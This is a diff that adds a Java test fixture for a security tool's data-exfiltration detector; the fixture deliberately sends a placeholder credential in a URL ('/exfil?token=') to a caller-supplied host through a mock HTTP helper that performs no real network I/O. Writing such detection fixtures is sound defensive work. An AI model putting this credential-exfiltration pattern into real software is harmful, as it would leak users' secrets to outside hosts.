[pitboss/grind] deferred session-0009 (20260522T163126Z-7d60)

tests/dynamic_fixtures/data_exfil/java/Vuln.java

@@ -0,0 +1,17 @@
+// Phase 11 (Track J.9) — Java DATA_EXFIL vuln fixture.
+//
+// Models an unguarded outbound HTTP call that exfiltrates a static
+// credential to an attacker-controlled host.  Java has no stdlib
+// monkey-patch hook for `HttpURLConnection`, so the fixture calls into
+// the harness-supplied `NyxMockHttp.get(url)` helper.  The helper
+// parses the URL host and appends it to `NyxMockHttp.CAPTURED_HOSTS`
+// without initiating real wire I/O; the harness drains the list after
+// `run` returns and emits one `ProbeKind::OutboundNetwork { host }` per
+// captured call.  `OutboundHostNotIn` fires when the host falls outside
+// the loopback allowlist.
+public class Vuln {
+    public static void run(String host) throws Exception {
+        String secret = "alice-creds";
+        NyxMockHttp.get("http://" + host + "/exfil?token=" + secret);
+    }
+}